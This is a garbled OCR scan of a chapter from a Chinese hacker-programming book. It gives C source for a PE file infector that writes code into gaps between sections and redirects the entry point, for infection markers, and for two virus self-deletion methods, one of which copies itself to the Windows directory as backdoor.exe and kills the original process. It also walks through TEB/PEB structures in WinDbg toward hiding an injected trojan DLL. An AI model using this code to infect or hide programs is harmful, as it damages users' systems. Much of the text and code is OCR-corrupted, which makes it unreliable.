大 部 分 病毒 都 有 感染 的 功能 ， 病 毒 会 把 自身 的 或 者 需要 其 他 程序 来 完成 的 指定 功能 的 代 
码 感染 给 其 他 正常 的 文件 。 就 像 人 类 的 流行 感冒 ， 办 公 室 中 只 要 有 一 个 人 携带 感冒 病毒 ， 就 
有 可 能 传染 所 有 人 。 如 果 有 人 没有 被 传染 ， 说 明 已 经 预防 过 了 。 因 此 在 机 器 上 安装 优秀 的 杀 
毒 软件 还 是 非常 有 必要 的 。 

前 面 说 过 ， 病 毒 要 感染 其 他 文件 也 就 是 把 病毒 本 身 的 攻击 代码 或 者 病毒 期 望 其 他 程序 要 
完成 的 功能 代码 写 入 其 他 程序 中 ， 而 想 要 对 其 他 程序 写 入 代码 就 必须 有 写 入 代码 的 空间 。 除 
了 把 代码 写 入 其 他 程序 中 以 外 ， 还 必须 让 这 些 代 码 有 机 会 被 执行 到 。 上 面 两 个 问题 都 是 比较 











尝 悟 僵 将 出 苗 呈 钼 山 吕 小 
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尝 瑾 宣 将 沿革 明 钼 册 o 惧 


| 


容易 解决 的 ， 下 面 分 别 来 讨论 。 

病毒 要 对 其 他 程序 写 入 代码 ， 必 须 确定 目标 程序 有 足够 的 空间 让 它 把 代码 写 入 。 通 常情 况 
下 有 两 种 比较 容易 实现 的 方法 ， 第 一 种 在 前 面 的 章节 介绍 过 ， 就 是 添加 一 个 节 区 ， 之 后 就 有 足 
够 的 空间 让 病毒 来 写 入 了 。 第 三 种 方法 是 缝隙 查找 ， 然 后 写 入 代码 。 何 为 缝 隐 ? 节 的 长 度 是 按 
照 IMAGE OPTIONAL HEADER 结构 体 中 的 FileAlignment 字段 对 齐 的 , 实际 每 个 节 的 长 度 不 
一 定 刚好 与 对 齐 后 的 长 度 相等 。 这 样 在 每 个 节 与 节 之 间 ， 必 然 有 没有 用 到 的 空间 ， 这 个 空间 就 
叫 缝隙 。 只 要 确定 要 写 入 代码 的 长 度 ， 然 后 根据 这 个 长 度 来 查找 是 否 有 满足 该 长 度 的 颖 际 就 可 
以 了 。 由 于 第 一 种 添加 节 区 的 方法 在 前 面 的 章节 中 已 经 介绍 过 了 ， 这 里 主要 介绍 第 二 种 方法 。 

2. 缝隙 搜索 的 实现 
通常 情况 下 ， 每 个 节 之 间 都 是 有 未 使 用 的 空间 的 ， 搜 索 这 些 未 使 用 的 空间 来 把 自己 的 代 
码 写 入 这 个 位 置 。 由 于 只 是 一 个 测试 代码 ， 因 此 不 会 写 具 有 攻击 性 的 代码 ， 写 入 目标 程序 的 
代码 的 功能 是 什么 都 不 做 ， 就 是 汇编 中 的 “NOP ”指令 ， 其 机 器 指令 是 0x90。 简 单 地 写 入 11 
个 0x90 就 可 以 了 。 定 义 如 下 : 


char shelleodel] = "\x90\x90\x90\x90\x90\xI0N\XIO0\KIONZIONKIO\ XEO\KOO0™"; 


搜索 缝隙 的 代码 如 下 : 

/7 颖 隙 的 搜索 从 代码 节 的 末尾 开始 搜索 

// 有 利于 快速 搜索 到 颖 阶 

DWORD FindSpace (LEVOID lpBase, PIMAGE NT HEADERS pNtHeader) 
{ 
































PIMAGE SECTION HEADER pSec = (PIMAGE SECTION HEADER) 
({ ( (BYTE*)& (pNtHeader->OptionalHeader) +pNtHeader->FileHeader .SizeOfOptionalHeader)); 


DWORD dwAddr = pSec->PointerToRawData + pSec->SizeOfRawData - sizeof (shellcode); 
dwAddr = (DWORD) (BYTE *)lpBase + dwAddr; 


LPEVOITD, Lp malloc(siseotlshellicode))s 
memset (lp, 0, sizeof (shellcode)); 


while (dwAddr > pSec->Misc.VirtualSize ) 
{ 
int nRet = memcemp'( (LPVOLID)dwAddr, lp, sizeof(sheilcode)); 
if ( nRet == 0 ) 
{ 
return dwAddr; 


] 


dwAaddr 一 一 
} 


free (lp); 


return 07 


} 

在 代码 节 和 紧 挨 代码 节 之 后 的 节 的 中 间 搜 索 缝 隙 ， 搜 索 的 方向 是 从 代码 节 的 末尾 开始 。 
笔者 认为 ， 反 方向 的 搜索 速度 要 快 一 些 。 通 过 该 代码 可 以 找到 缝隙 ， 但 是 也 可 能 找 不 到 缝隙 ， 
因此 在 调用 完 该 函数 后 要 做 一 些 判断 ， 以 应 变 各 种 不 同 的 情况 。 

3， 感染 目标 程序 文件 实现 

把 代码 添加 到 了 目标 文件 中 ， 但 是 这 些 代码 如 何 才 能 被 执行 到 呢 ? 这 就 要 修改 目标 可 执 
行文 件 的 入 口 地 址 。 修 改 目 标 入 口 地 址 后 ， 让 其 先 来 执行 自己 的 代码 ， 然 后 跳 转 到 原来 程序 
的 入 口 处 继续 执行 ， 很 多 病毒 都 是 这 样 工作 的 。 修 改 一 下 机 器 码 ， 定 义 如 下 : 


char shellcodel] = "\x90\x90\x90\x90\xb8\x90\x90\x90\Nx90\xff\xe0\x00"; 





中 
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317 
把 机 器 码 的 后 几 字 节 改 为 一 条 mov 指令 和 一 条 jmp 指令 ， 这 个 过 程 和 前 面 章节 介绍 的 








inline hook 有 些 类 似 。 写 一 个 程序 来 调用 上 面 的 函数 ， 并 且 将 机 器 码 写 入 目标 程序 中 ， 有 具体 
代码 如 下 : 章 
nt maini(int areu chav i earnyw lly 
{ 黑 
HANDLE hFile = NULL; 客 
HANDLE hMap = NULL; 编 
LPVOID lpBase = NULL; 程 
年 
haine = "Createnilel( test. axew, 头 
GENERIC_READ | GENERIC WRITE, 例 
PILE_SHARE READ, 剖 
NULL, 析 
OPBPEN_EXISTING， 
FILE ATTRIBUTE NORMAL, 
NULL)? 
, Pa 
hMap = CreateFileMapping (hrile, 
NULL, 
PAGE, READWRITE, 
0， 
0 


0) 7 


JpBase = MapViewOfFile'(hMap, 
ELLER MAP READ | FILE MAP WRITE, 
0, 
0， 
0); 


PIMAGE DOS HEADER pDosHeader = (PIMAGE DOS HEADER) lpBase; 
PIMAGE NT HEADERS pNtHeader = NULL; 


PIMAGE_ SECTION, HEADER PSec = NULL; 


IMAGH SECTION HEADER mogSsec, = {0 2» 


if (pDosHeader->e magic !'= IMAGE DOS_ STIGNATURE ) 
{ 

UnmapViewOfFile (lpBase); 

CloseHandle (hMap); 

CioseHandle(hi lle) 

= 


} 
pNtHeader = (PIMAGE NT HEADERS) ( (BYTE*)]lpBase + PDosHeader->e lfanew); 


if ( pNtHeader->Signature != IMAGE NT STIGNATURE ) 
{ 

UnmapViewOfFile (lpBase),; 

CloseHandle (hMap); 

closeHandie(heile); 


Eeturnr Ls 


} 
DWORD dwAddr = FindSpace (lpBase, pNtHeader); 


// 原 入 口 地 址 

DWORD dwOep = pNtHeader->OptionalHeader.ImageBase + pNtHeader->OptionalHeader. 
AddressOfEntryPoint; 

*(DWORD *)&shellcode[5] = dwOep; 








人 了 
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mefmcpy((chac *)dwAddr, shellcode, strlen(shellcode) + 3) 7 
第 dwAddr = dwAddr = (DRORD) (BYTE *)lpBase; 
77 新 六 口 地 址 
学 pNtHeader->0ptionalHeader.AddressOfEntryPoint = dwAddr; 
是 UnmapViewOfFile (lpBase); 
客 CloseHandle (hMap); 
编 CloseHandle (hFile); 
程 
实 return 0: 
例 l 
下 编译 连接 后 ， 找 个 以 前 写 的 VC 程序 ， 将 其 改名 为 “hello.exe”， 并 放 到 同一 个 目录 下 ， 
| 然后 运行 这 个 感染 程序 。 用 OD 打开 “hello.exe” 程 序 ， 如 图 8-22 所 示 。 
| 
从 图 8-22 中 可 以 看 出 ， 感 染 是 成 功 的 ， 而 Timp eax 指令 中 的 eax 保存 的 是 “hello.exe” 
程序 的 原始 入 口 地 址 。 运行 被 感染 的 目标 程序 ， 是 可 以 运行 的 。 再 次 对 其 进行 一 次 感染 ， 然 
后 用 OD 打开 看 一 下 目标 程序 “hello.exe”， 如 图 8-23 所 示 。 


B8 F34F4108 MOY shello. 0414FF3 


FFED WE 


8888 ADD 
90 NOP 
98 | NOP 
96 NOP 
98 NOP 

[LT | 88 AG1F4806 HOU :hello .90461FAG 
04414FFC Waa NE i |helilo. 0mAtFAG ;| FFE® ip 
BB414FFE| 68908 | ADD » b E| 86680 | ADD 


图 8-22 ”被 感染 后 的 目标 程序 入 口 图 8-23 被 三 次 感染 的 目标 程序 入 口 











可 以 看 到 目标 程序 被 二 次 感染 了 。 由 于 只 是 添加 了 一 些 简单 的 跳 转 指令 ， 因 此 没有 太 大 
影响 ， 但 是 如 果 是 真正 的 病毒 ， 很 有 可 能 导致 被 感染 的 目标 程序 无 法 正常 运行 。 因此， 需要 
对 被 感染 过 的 文件 写 一 个 标志 ， 这 样 就 可 以 避免 被 二 次 感染 了 。 

.添加 感染 标志 

为 了 避免 重复 感染 目标 程序 ， 必 须 对 目标 程序 写 入 感染 标志 ， 以 防 被 二 次 感染 ， 导致 目 
标 程序 无 法 执行 。 每 次 在 对 程序 进行 感染 时 都 要 先 判断 是 否 ;有 感染 标志 ， 如 果 有 感染 标志 ， 
则 不 进行 感染 ， 如 果 没 有 感染 标志 ， 则 进行 感染 。PE 文件 结构 中 有 非常 多 不 实用 的 字段 ， 可 
| 以 找 一 个 合适 的 位 置 写 入 感染 标志 。 想 必 这 非常 容易 理解 ， 下 面 直 接 看 代码 。 写 入 感染 标志 
| 的 代码 如 下 : 


BOOL Writesig(DWORD dwAddr, DWORD GQwsig，HRANDLE hrFile) 














| { 
| DWORD dwNum = 0;» 
| 
SetFilePointer(hFile, dwAddr, 0, FILE BEGIN); 
WriteFile(hFile, &dwSig; sizeof (DWORD), &dwNum, NULL); 
retarnl TRUEy 
} 


读 取 感染 标志 的 代码 类 似 ， 具 体 如 下 : 


BOOL CheckSig (DWORD dwAddr, DWORD dwSig, HANDLE hEFile) 
{ 
DWORD dwSigNum = 0; 
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DWORD dwNum = 0; 
SetFijePointer (hFile, dwAddr, 0, EFILE BEGIN); 
ReadFile(hFile, &dwSigNum, sizeof (DWORD), &dwNum, NULL); 


if ( dwSigNum == dwSig ) 


{ 
return TRUE; 


return FALSE; 


} 
每 次 在 进行 感染 前 先 调 用 CheckSig0 函 数 ， 判 断 是 否 有 感染 标志 ， 然 后 根据 是 否 被 感染 
做 出 不 同 的 选择 。 调 用 以 上 两 个 函数 的 方法 如 下 : 


在 代码 中 把 感染 标志 写 到 IMAGE DOS_HEADER 中 的 e_cblp 位 置 处 。IMAGE DOS_ 


HEADER 中 除了 e_magic 和 e_lfanew 两 个 字段 外 ， 其 余 都 是 没有 用 的 ， 用 户 可 以 放心 写 入 。 
代码 中 的 offsetof0) 是 一 个 宏 ， 其 定义 如 下 : 


#define offsetof (s,m) (size t)&(((s *)0)->m) 

该 宏 的 作用 是 取得 某 字 段 在 结构 体 中 的 偏 移 。 对 于 IMAGE_DOS_HEADER 结构 体 中 的 
e_cblp 来 说 ， 它 在 结构 体 中 的 偏 移 是 2。 那 么 offsetofIMAGE DOS_HEADER,e cblp) 返 回 的 
值 则 为 2， 读 者 可 以 调试 跟踪 一 下 。 


8.1.4 ”病毒 的 自 删除 技术 


某 些 程序 在 首次 运行 以 后 就 莫名 其 妙 地 消失 。 当 人 们 意识 到 这 是 病毒 或 木马 时 已 经 晚 了 ， 
悔恨 自己 没 装 杀 毒 软件 。 其 实 病毒 或 木马 被 执行 后 都 把 自己 复制 到 系统 盘 里 ， 修 改 一 个 看 起 
来 很 重要 的 文件 名 ， 并 且 把 自己 隐藏 得 很 深 。 

本 小 节 介 绍 两 种 关闭 病毒 自 删 除 的 方法 ， 第 一 种 是 非常 简单 也 是 比较 常见 的 方法 ; 第 二 
种 是 比较 另类 的 方法 ， 是 笔者 在 无 意 中 分 析 一 个 简单 的 病毒 时 学 到 的 自 删 除 技术 。 

1. 通过 批 处 理 进行 自 删 除 

自 删 除 的 方法 有 很 多 ， 最 简单 的 方法 就 是 创建 一 个 “.cmd” 批 处 理 文件 。 批 处 理 文件 中 
通过 DOS 命令 del 来 删除 可 执行 文件 ， 再 通过 del 删除 自身 。 它 的 实现 代码 如 下 : 


Void CreateBat () 
{ 


HANDLE hrile = CreateFile ("delself.cmd", 
GENERIC WRITE, 
FILE SHARE READ, 
NULL;, 
CREATE ALWAYS, 
FILE ATTRIBUTE NORMAL, 
NULL):; 
if (hFile == ITNVALID HANDLE VALUE ) 
{ 
Peturnly 


} 


char szBat[MAX PATH] = {0}; 
char szSelfName [MAX PATH] = {0}; 


GetModuleFileName (NULL, szSelfName, MAX PATHB) 


strcat (szBat, "del 1m) 7 

strcat (szBat, szSelfName); 

Strcat (azBats "VEN ) 

strcat (szBat, "del delself.cmd");} 


将 前 泌 昱 湘 。” 需 % 溃 











病 翡 空 将 前 其 昱 湘 ” 帽 % 识 
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DWORD dwNum = 0; 
WriteFile(hFile, szBat, strlen(szBat) + 1, &dwNum ,NUEL); 
CloseHandle (hFile); 
// 运行 
; WinExec ("delself,.cmd", SW_ HIDE); 
直接 在 main(0 函 数 中 调用 CreateBat(O 函 数 ， 编 译 连接 并 运行 它 。 可 以 看 到 ， 编 译 好 的 程 
序 消失 了 。 其 实 是 创建 的 批 处 理 文件 将 编译 好 的 程序 和 批 处理 本 身 都 删除 了 。 这 样 就 达到 了 
自 删 除 的 功能 。 
2. 通过 启动 参数 进行 自 删除 
通过 启动 参数 进行 自 删 除 的 方法 是 笔者 无 意 中 分 析 一 个 病毒 时 学 到 的 方法 。 下 面 介绍 这 
种 自 删除 的 思路 。 
首先 ， 病 毒 在 磁盘 上 第 一 次 启动 时 ， 会 将 自身 复制 到 系统 目录 下 。 而 病毒 的 当前 位 置 通 
常 不 会 在 系统 目录 下 。 比 如 说 ， 下 载 一 个 软件 到 D 盘 中 ， 这 个 软件 的 名 字 为 muma.exe。 运 
行 这 个 程序 后 ， 它 会 将 自身 复制 一 份 到 系统 目录 下 ， 叫 backdoorexe。 病 毒 如 何 判断 自己 是 
否 是 第 一 次 运行 呢 ? 它 的 依据 是 自己 所 在 的 位 置 ， 如 果 病 毒 在 系统 目录 下 ， 则 认为 自己 不 是 
第 一 次 运行 ， 和 否则 就 视 为 自己 是 第 一 次 运行 。 
其 次 ， 病 毒 第 一 次 启动 将 自己 复制 到 其 他 目 
录 后 ， 将 要 完成 自 删除 的 动作 。 那 么 病毒 如 何 完 
成 自 删 除 的 动作 呢 ? 病毒 先 得 到 自己 所 在 的 目录 
及 文件 名 ， 比 如 D:\muma.exe， 然 后 病毒 在 将 自 
己 复 制 到 系统 目录 后 ， 会 运行 系统 目录 下 的 病毒 
的 副本 ， 并 将 它 当 前 的 位 置 及 文件 名 以 参数 的 方 
式 传 递 给 系统 目录 下 的 病毒 。 






否 
判断 是 否 
复制 自身 到 有 参数 
系统 目录 





了 we A - 结束 原 病毒 
最 后 ， 系 统 目 录 下 的 病毒 被 原 病毒 启动 ， 并 启动 系统 目 进程 并 删除 
录 下 的 病毒 ， 原 病毒 文件 






且 得 到 了 原 病毒 的 位 置 。 这 样 ， 系 统 目录 下 的 病 
副本 ,根据 原 病毒 提供 的 位 置 和 病毒 的 文件 名 ， 
将 原 病毒 进程 结束 ， 并 将 原 病毒 删除 。 

自 删 除 的 流程 图 如 图 8-24 所 示 。 

既然 有 了 病毒 的 流程 , 下 面 就 来 实现 其 代码 。 

先 完成 儿 个 通用 的 函数 : 从 进程 名 得 到 进程 
的 ID， 调整 进 程 权 限 到 调试 权限 ,结束 某 个 进程 。 这 3 个 函数 是 要 用 到 的 函数 ， 先 来 完成 它 


们 。 代 码 如 下 : 
// 调整 权限 
VOID DebugPrivilege'() 


并 将 自身 位 
置 传递 给 它 









病毒 退出 或 执 


执行 病毒 的 
其 他 动作 
行 其 他 动作 


图 8-24 ” 自 删 除 流程 图 





HANDLE hToken = NULEL; 
BOOL bRet = OpenProcessToken (GetCurrentProcess(), TOKEN ALL ACCESS, &hToken) : 


LE (DRet == TRUE ) 
{ 
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TOKEN BRIVILEGES HEB7 

tp.PrivilegeCount = 1; 

LookupPrivilegeValue (NULL, SE DEBUG NAME, g&tp.Privileges[0] .Luid); 
tp.Privileges[0] .Attributes = SE PRIVILEGE ENABLED; 
AdjustTokenPprivileges (hToken, FALSE, &tp, sizeof (tp), NULL, NULL); 


CloseHandle (hToken); 


a 
// 获得 某 进 程 的 PID 


DWORD GetProcesslidl(char *szProcessName) 
{ 
DWORD dwPid = 0; 
BOOL bRet = 0; 
PROCESSENTRY32 pe32 = { 0 }; 
pe32-dwSize = sizeof (PROCESSENTRY32); 


HANDLE hsSnap = CreateToolhelp32S3napshot (TH32CS_ SNAPPROCESS, 0); 
bRet = Process32First (hsSnap, &pe32); 


while ( bRet ) 
{ 


if ( strcmp (pe32.s3zExeFile, szProcessName) == 0 ) 
{ 
break; 
} 
bRet = Process32Next (hSnap, &pe32); 
} 


dwPid = pe32.th32Process1iD; 
return dwPid; 
} 


/7 结束 某 进 程 
VOID CloseProcess (DWORD dwPid) 
{ 
HANDLE hProcess = OpenProcess (PROCESS ALL ACCESS, FALSE, dwPid); 
TerminateProcess (hProcess, 0):; 
CloseHandle (hProcess);} 
} 
完成 这 几 个 函数 后 ， 就 来 根据 病毒 的 流程 完成 病毒 的 主体 代码 ， 具 体 如 下 : 
int main(int argc, char **argv) 
{ 
77 Windows 目录 
char szWinDir[MAX PATH] = { 0 }; 
// 当前 目录 
char szCurrDir[MAX PATH] = { 0 )}7 


GetWindowsDirectory(szWinDir, MAX PATH); 
GetModuleFileNanme (NULL, szCurrDir, MAX PRATH) 7 


/1 获取 当前 的 目录 

int "ch = NN"y 

char *pFileName = strrchr(szCurrDir, ch); 

int nLen = ‘strlen(szCurrDir) 一 strilen (pFileName); 
szCurrDir{[nLen] = NULL; 


if (stremp (szWinDir, szCurrDir) == 0 ) 


' 
// 相同 目录 
// 判断 参数 个 数 
// 根据 参数 个 数 判断 是 否 需 要 删除 原 病毒 文件 
// 如果 病毒 是 开机 自动 启动 的 话 ， 不 会 带 有 参数 
printf("arge = %d \r\n", arge)? 
if ( argc == 2 ) 


山 小 


尝 合 本 将 栅 著 啊 凶 


| 












尝 悟 但 将 前 著 啊 狂 山中 潍 


”第 8 章 黑客 编程 实例 剖析 








el Ns 
pFileName = strrchr(argv{l1], ch); 
pFileName 十 十 7 
PrintE("pFileName = %s \r\n", pFileName); 
DWORD dwPid = GetProcessIid(pFileName); 
printf("dwPid = $%d \r\n", dwPid); 
DebugPrivilege(); 
CloseProcess (dwPid); 
prileName = argv[1]; 
printf ("pFileName = %s \r\n”", pFileName); 
Sleep (3000)， 
DeleteFilel(pFileName); 

} 


else 


// 病毒 的 功能 代码 


// 不 同 目录 ， 说 明 是 第 一 次 运行 
// 复制 自身 到 Windows 目录 下 


strcat (szWinDir, “"\\backdoor.exe"),; 
GetModuleFileName (NULL, szCurrDir, MAX PATH); 
CopyFile(szCurrDir;: szWinDir, FALSE); 


// 构造 要 运行 Windows 目录 下 的 病毒 
// 以 及 要 传递 的 自身 位 置 
Streab (azWinpire Neonys 
strcat (szWinDir, szCurrDir); 
Streat (samNinDir "Nuys 
peintf ("SS NE\n", SZWinDiy)? 
WinExec(szWinDir, SW SHOW); 
Sleep{(1000): 

} 


// 保持 病毒 进程 不 退出 
getch(); 
return 0O; 


} 

代码 中 给 出 了 详细 的 注释 ， 而 且 在 介绍 代码 之 前 也 有 详细 的 流程 描述 。 想 必 读 者 对 这 种 
自 删 除 的 方法 都 已 经 掌握 了 。 这 种 方法 没有 太 多 的 技术 性 ， 关 键 是 它 的 思路 比较 好 。 启 动 一 
个 程序 时 ， 可 以 为 其 传递 参数 ， 从 而 控制 进程 在 运行 时 的 动作 ， 而 参数 也 来 源 于 自己 的 上 一 
次 运行 。 


8.1.5 隐藏 DLL 文件 


为 了 隐藏 木马 进程 ， 把 木马 的 全 部 功能 实现 在 DLL 文件 中 ， 然 后 将 DLL 文件 注入 其 他 
进程 中 ， 从 而 达到 隐藏 木马 进程 的 目的 。 现 在 要 做 的 是 隐藏 进程 中 的 DLL 文件 ， 当 把 DLL 
文件 注入 远程 进程 后 ， 可 以 将 DLL 也 隐藏 掉 。 操 作 系统 在 进程 中 维护 着 一 个 叫 作 TEB 的 结 
构 体 ， 这 个 结构 体 是 线程 环境 块 。 下 面 通过 WinDBG 调试 工具 来 一 步 一 步 地 介绍 TEB， 并 通 
过 TEB 介绍 如 何 隐藏 DLL 文件 。 

1. 启动 WinDBG 

启动 WinDBG 工具 ， 如 图 8-25 所 示 。 
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图 8-25 WinDBG 启动 界面 


依次 单 击 菜单 栏 的 “File” 一 “Symbol File Path” 命 令 ， 输 入 符号 文件 路 径 。 这 里 直接 填 
入 微软 提供 的 符号 服务 器 : “srv*F:\Program Files\symbolcache*http://msdl. microsoft.com 
/download/symbols”， 如 图 8-26 所 示 。 

设置 好 符号 路 径 ， 就 可 以 开始 调试 了 。 这 里 调试 的 目标 就 是 WinDBG， 因 为 原理 是 相同 
的 。 进 行 本 地 调试 ， 依 次 单 击 菜单 “File” 一 “Kernel Debug” 命 令 ， 出 现 如 图 8-27 所 示 的 
窗口 。 





图 8-26 设置 符号 文件 路 径 8-27 Kernel Debugging 窗口 界面 


选择 “Local ”选项 卡 ， 也 就 是 进行 本 地 调试 ， 单 击 “ 确 定 ” 按 钮 。 这 样 ， 就 可 以 用 WinDBG 
开始 调试 ， 跟 着 步骤 一 步 一 步 做 就 可 以 了 。 

2 分析 步骤 

首先 获取 TEB， 也 就 是 线程 环境 块 。 在 编程 的 时 候 ，TEB 始终 保存 在 寄存 器 FS 中 。 获 
取 i ds “lteb”。 让 en ee 示 处 输入 该 命令 WinDBG 将 输出 内 容 : 
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EnvironmentPointer: 00000000 

ClientIQ: 00000554 . 00000320 
RpcHandle: 00000000 

Tls Storage: 00000000 

PEB Address: 7£fd5000 
LastErrorValue; 0 

LastStatusValue: c0000139 

Count Owned Locks: 0 

HardErrorMode: 0 


从 上 面 的 输出 内 容 可 以 看 出 ，TEB 地 址 为 7ffde000。 
获得 TEB 以 后 ， 通 过 TEB 的 地 址 来 解析 TEB 的 数据 结构 ， 从 而 获得 PEB， 也 就 是 进程 


环境 块 ， 命 令 为 “dt teb 7ffde000”，WinDBG 的 输出 内 容 如 下 : 
lkd> dt teb 7Efde000 


nt!, TEB 
+0Ox000 NtTib Ca i i al 
+0x0l1c EnvironmentPointer : (null) 
+0x020 ClientIid 并 和 本 下 TP 
+0x028 ActiveRpcHandle : (null) 


+0x02c ThreadLocalStoragePointer : (null) 
+0x030 ProcessEnvironmentBlock : Ox7ffd5000 _PEB 


+0x034 LastErrorValue ey 
+0x038 CountOfOwnedCriticalSections : 0 
+0x03c CsrClientThread 2 (null) 


+0x040 Win32ThreadInfo : Oxe2bfb1l30 
+0x044 User32Reserved se 


+0x0Qac UserReserved ‘9 
+0x0c0 WOW32Reserved >» “(Hm 
+0x0c4 CurrentLocale : Ox804 
+0x0c8 FpSoftwareStatusRegister : 0 
+0x0cc SystemReservedl1! ': [54] (null) 


上 面 只 是 部 分 输出 ， 该 结构 体 非常 长 ， 这 里 只 查看 其 中 的 一 部 分 内 容 ， 只 要 找到 PEB 在 
TEB 中 的 偏 移 就 可 以 了 。 从 该 命令 的 输出 可 以 看 出 ，PEB 结构 体 的 地 址 位 于 TEB 结构 体 偏 移 
0x30 的 位 置 ， 该 位 置 保存 的 地 址 是 7fftdu5000。 也 就 是 说 ，PEB 的 地 址 是 7fftdus000， 通 过 该 地 址 
来 解析 PEB， 并 获得 LDR。 在 命令 提示 符 处 输入 命令 “dt nt!_peb 7ffd5000”， 输 出 如 下 内 容 : 


lkd> dt nt! peb 7ffd5000 
+0x000 InheritedAddressSpace : 0 "!' 
+0x001 ReadImageFileExecOptions : 0 '"' 


+0x002 BeingDebugged ed,; 

+0x003 SpareBool eu 

+0x004 Mutant :QEEfEESEE 

+0x008 ImageBaseAddress : 0x01000000 

tO0x00c¢ Ldr ; Ox001ale90 _PEB_ LDR DATA 

+0x010 ProcessParameters : 0x00020000 _RTL USER PROCESS PARAMETERS 
+0x014 SubSystemData > RELJ 

+0x018 ProcessHeap : Ox000a0000 

+0x0lc FastPebLock ; 0x7c9a0600 RTL CRITICAL SECTION 


+OxX020 FastPpebLockRoutine :; 0x7c921000 
+0x024 FastPebUnlockRoutine : 0x7c9210e0 
+0x028 EnvironmentUpdateCount : -1 

+0x02c KernelCallbackTable : 0x77d12970 


从 输出 结果 可 以 看 出 ，LDR 在 PEB 结构 体 偏 移 的 0x0C 处 , 该 地 址 保存 的 地 址 是 001ale90。 
通过 该 地 址 来 解析 LDR 结构 体 。 在 命令 提示 符 处 输入 命令 “dt _peb_ldr data 001ale90”， 


WinDBG 输出 如 下 内 容 : 
lkd> dt peb ldr data 001ale90 
nt! PEB LDR DATA 


+0x000 Length : 0x28 
+0x004 Initialized si OA 
+0x008 SsHandle S(T 


+0x00c InLoadOrderModuleList : _LIST ENTRY [ 0xlalec0 - 0xla3218 ] 
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+0x014 InMemoryOorderModuleList : _LIST ENTRY [ Oxlalec8 - 0x1a3220 ] 
+0x01c' InIinitializationOrderModuleList ; LIST ENTRY [ 0xlalf28 -= 0xla3228 | 
+Ox024 EntryInProgress ';: (null) 


在 这 个 结构 体 中 ,可 以 看 到 3 个 相同 的 数据 结构 ， 也 就 是 在 偏 移 0x0c、0x14、0x24 处 的 
3 个 结构 体 LIST_ENTRY。 该 结构 体 是 个 链表 ， 定 义 如 下 : 


typedef struct LrST ENTRY { 
struct LEST ENTRY *Flinky 
struct TIST ENTRY BlinK; 
} LIST. ENTRY, *PLIST ENTRY: 


上 面 这 个 结构 体 在 SDK 提供 的 帮助 中 是 找 不 到 的 ， 需 要 去 WDK 的 帮助 中 才 可 以 找到 。 
这 3 条 链表 分 别 保 存 的 是 LDR DATA TABLE ENTRY， 也 就 是 LDR_DATA 表 的 入 口 。 
现在 来 手动 遍历 第 一 条 链表 ， 输 入 命令 “dd lalec0”: 


lkd> ad lalec0 XY/ 1ist entry 的 地址 

00lalec0 00lalf18 O00liale9c 00lalf20 001alea4 
00ialed0 00000000 00000000 01000000 010582f7 
001alee0 00096000 00580056 00020c64 00160014 
O00laief0 00020ca6 00005000 O0000ffff 001a2cd4 
001alf00 7c99e310 49a5f6a7 00000000 00000000 
001alfl10 000b000pb 000801b7 00lalfc0 001alec0 
001lalf20 001alfc8 00ialec8 00lalfd0 001aleac 
001adlf30 7c920000 7c932c60 00096000 0208003a 


在 这 么 多 的 输出 中 ， 在 链表 偏 移 0x18 的 位 置 是 模块 的 映射 地 址 ， 即 ImageBase; 在 链表 
偏 移 0x28 的 位 置 是 模块 的 路 径 及 名 称 的 地 址 ; 在 链表 偏 移 0x30 的 位 置 是 模块 名 称 的 地 址 。 
lalec0 偏 移 0x28 的 位 置 中 保存 的 地 址 是 20c64， 接 下 来 输入 命令 “du 20c64”: 


lkd> du 20c64 
00020c64 "FEF:\WinDDK\7600.16385.0\Debuggers" 
00020ca4 "\windbg.exe" 


可 以 看 到 ， 输 出 WinDBG 的 全 部 路 径 。 再 来 看 一 下 偏 移 0x18 的 地 址 ， 该 进程 的 映射 基 
址 为 01000000。 偏 移 0x30 处 的 地 址 保存 着 20ca6， 查 看 该 地 址 ， 输 入 命令 “du 20ca6”: 


lkd> du 20ca6 
00020ca6 "windbg,.exe" 


的 确 是 模块 的 名 称 。 既 然 是 链表 ， 就 来 下 一 条 链表 的 信息 : 
lkd> dd 1alf18 // lalf18 中 保存 的 是 下 一 个 list_entry 的 地 址 
001lalf18 00lalfc0 O00lalec0 00lalfc8 O00lalec8 

001alf28 001lalfd0 00laleac 7c920000 7c932c60 

001lalf38 00096000 0208003a 7c9a0028 00140012 

001alf48 7c942838 80084004 0000ffff 7c99e2c8 

001lalf58 7c99e2c8 498ffe8a 00000000 00000000 

001alf68 000b000a 000e01b8 003a0043 0057005c 

O00lalf78 004e0049 004f0044 00530057 0073005c 

001alf88 00730079 00650074 0033006Q 005c0032 

likd> dd laifc0 // _1list_entry 的 地 址 

OO0lalfc0 001a2068 001ialf1i8 001a2070 001alf20 

O00lalfd0 001a21b8 001alf28 7c800000 7c80b5be 

0Q0lalfe0 0011d000 00420040 001alf70 001a0018 

001alff0 00lalf98 80084004 0000ffffE 001a2a44 

001a2000 7c99e2b0 49c4f753 00000000 00000000 

001a2010 000b000a 000e0157 003a0043 0057005c 

001a2020 004e0049 004f0044 '00530057 0073005c 

001a2030 00730079 00650074 0033006d 005c0032 


按照 上 面 介绍 的 解析 方法 ， 自 己 进行 解析 。 
lkd> du 1a1£70 


001alf70 "CcC:\WINDOWS\system32\kernel32.d1il1" 
GOGOLalfd0. "™ 


上 面 介 绍 的 几 个 结构 体 在 VC6 的 头 文件 中 是 找 不 到 的 , 不 过 在 网 上 还 是 可 以 查 到 的 。 这 





里 给 出 MSDN 上 给 出 的 几 个 结构 体 的 定义 ， 该 MSDN 的 地 址 为 http://msdn.microsoft. com/zh- 
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cn/library/aa813708(v=VS.85).aspx， 方 便 用 户 查看 。 涉 及 的 几 个 结构 体 的 定义 如 下 : 
typedef struct _PEB _ LDR DATA { 
BYTE Reserved1i[8]; 
PVOID Reserved2[3]; 
LIST ENTRY InMemoryOrderModuleList; 
} PEB LDR_ DATA, *PPEB, LDR DATA; 


typedef struct _LDR DATA TABLE 了 ENTRY 1 
' PVOID Reservedl [2]; 
LIST ENTRY InMemoryOrderLinks; 
PVOID Reserved212]; 
PVOID DllBase; 
PVOID EntryPoint; 
PVOID Reserved3; 
UNICODE STRING FullDllName; 
BYTE Reserved4[8]; 
PVOID Reserved5[3];» 
union { 
ULONG CheckSum; 
PVOID Reservedé; 
}7 
ULONG TimeDateStamp’; 
} LDR_DATA TABLE ENTRY, *PLDR DATA TABLE ENTRY; 


从 这 两 个 结构 体 中 可 以 看 出 有 非常 多 的 保留 字段 ， 这 些 都 是 微软 不 愿意 公开 的 ， 或 不 愿 
